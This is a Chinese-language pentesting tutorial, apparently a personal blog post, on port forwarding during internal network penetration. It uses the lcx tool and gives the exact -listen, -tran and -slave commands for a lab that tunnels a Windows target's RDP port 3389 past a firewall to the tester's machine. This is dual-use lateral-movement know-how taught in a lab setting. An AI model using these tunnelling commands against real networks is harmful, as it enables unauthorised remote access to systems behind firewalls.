最近在搞内网渗透,碰到 端口转发&边界处理 的时候,我们就可以借助一些小工具了,这类工具有很多,这里主要说明lcx的用法。
lcx是个很老的端口转发工具,而它的使用也很简单。不过想要把lcx玩清楚,首先要明白端口转发是什么意思,以及我们为什么要做端口转发。
咳咳,说了一堆废话!!
好的,接下来进入正题。首先来了解一下端口转发这个东东~~
1.本机和靶机处于同一个内网、本机和靶机都处于外网 、本机处于内网,靶机处于外网。
- 这种情况下我们直接进行连接即可。
2.本机处于外网,靶机处于内网。
- 这个时候我们就需要将靶机的3389转发至本机的端口(未被占用)。
- 此时我们连接本机被转发的端口就可以连接到处于内网环境的靶机。
3.本机处于内网,靶机处于另一个内网。
- 这种情况下需要将本机的端口映射出去。
- 在将靶机的3389转发出来。
- 与2相比就多了一个步骤:将本机端口映射到外网。
这里再说一下lcx的用法:
-listen 3333 2222
# 监听本机的3333端口并将数据转发到2222端口
-tran 3333 127.0.0.1 3389
# 在主机上运行远程桌面,连接目标机的3333端口,可以连接到主机的3389端口。
目标机上运行:lcx -tran 3333 192.168.125.102 3389 其中192.168.125.102是第三台机。
# 在主机上运行远程桌面,连接目标机的3333端口,可以连接到第三台机的3389端口。-slave 192.168.5.100 3333 127.0.0.1 3389
将本机的3389的数据转发到192.168.5.100的3333端口
下面开始实战:
环境配置(环境简陋~~):
本机:win2008:192.168.5.100(模拟外网服务器)
靶机:winXP:192.168.5.102
首先在本机上运行:
lcx -listen 3333 2222 # 监听本机的3333端口然后将数据转发到2222端口上。
在靶机上运行:
lcx -slave 192.168.5.100 3333 127.0.0.1 3389 # 靶机自愿将自己的3389端口数据转发至192.168.5.100的3333端口。 # 因为这里是靶机"自愿"的,所以可以穿透防火墙。
本机连接本机的2222端口(相当于连接到靶机的3389端口)
大功告成!!!不知道为什么看到这个界面心情莫名的激动!!
